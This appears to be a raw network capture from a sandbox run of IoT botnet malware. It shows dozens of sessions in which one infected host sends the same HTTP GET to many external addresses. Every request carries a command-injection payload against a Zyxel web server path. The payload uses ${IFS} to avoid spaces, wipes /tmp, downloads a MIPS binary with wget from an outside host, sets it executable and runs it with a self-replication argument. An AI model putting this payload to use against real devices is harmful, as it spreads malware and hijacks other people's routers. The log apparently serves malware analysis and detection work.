                                    Jan 13, 2024 19:02:52.606467962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9012192.168.2.1352816118.209.3.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606515884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9013192.168.2.133795035.142.43.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606563091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9014192.168.2.1346590213.205.121.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606626034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9015192.168.2.1333540157.123.27.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606702089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9016192.168.2.133345660.22.192.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606766939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9017192.168.2.1348074186.109.84.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606828928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9018192.168.2.1333012193.38.5.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606883049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9019192.168.2.135026097.1.176.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606926918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9020192.168.2.135176814.38.195.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606975079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9021192.168.2.135386884.154.206.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607016087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9022192.168.2.1345606117.180.254.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607078075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9023192.168.2.13579804.146.205.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607109070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9024192.168.2.133970032.164.139.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607172966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9025192.168.2.1343402222.112.16.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607233047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9026192.168.2.136011053.189.111.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607307911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9027192.168.2.1342094161.9.19.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607379913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9028192.168.2.1353294196.247.101.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607419968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9029192.168.2.1337578199.9.255.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607472897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9030192.168.2.1340450110.49.37.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607546091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9031192.168.2.1347996184.243.112.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607599974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9032192.168.2.1337110190.98.250.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607656956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9033192.168.2.1346590211.232.91.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607722998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9034192.168.2.1358754223.249.86.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607790947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9035192.168.2.13379422.71.2.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607836962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9036192.168.2.1359126144.98.72.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607871056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9037192.168.2.1342156221.42.144.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607933044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9038192.168.2.1352272195.175.14.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.607986927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9039192.168.2.1357508193.26.222.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608036041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9040192.168.2.1347464216.46.135.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608099937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9041192.168.2.1344488207.7.231.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608125925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9042192.168.2.133630672.46.201.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608170033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9043192.168.2.1337010139.102.176.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608251095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9044192.168.2.1352678109.134.7.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608321905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9045192.168.2.1354958152.33.26.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608381033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9046192.168.2.1358048173.199.164.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608412981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9047192.168.2.1354188150.0.79.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608488083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9048192.168.2.1360002218.181.105.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608537912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9049192.168.2.133657286.234.170.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608591080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9050192.168.2.1348066206.245.23.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608648062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9051192.168.2.1347962166.220.158.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608690977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9052192.168.2.1333038126.77.224.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608767986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9053192.168.2.1339170146.248.62.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608820915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9054192.168.2.134309674.219.181.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608901024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9055192.168.2.1359754172.159.81.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608937025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9056192.168.2.1359414128.202.71.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.608999968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9057192.168.2.135750297.86.53.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609061003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9058192.168.2.135505847.43.162.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609123945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9059192.168.2.134300478.157.253.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609201908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9060192.168.2.1341704192.27.233.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609257936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9061192.168.2.135316680.201.219.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609308958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9062192.168.2.1344470199.72.156.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609349012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9063192.168.2.1338888109.181.202.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609405994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9064192.168.2.1349312133.167.66.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609458923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9065192.168.2.1339088102.121.89.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609519005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9066192.168.2.13353504.177.169.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609563112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9067192.168.2.1333476202.68.189.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609630108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9068192.168.2.1339164139.60.136.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609688997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9069192.168.2.1332786107.56.80.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609757900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9070192.168.2.1333698185.30.112.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609800100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9071192.168.2.1358848113.102.210.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609863997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9072192.168.2.133628699.143.22.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609931946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9073192.168.2.1333704137.54.14.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.609983921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9074192.168.2.1337192130.72.86.51443
                                    TimestampBytes transferredDirectionData
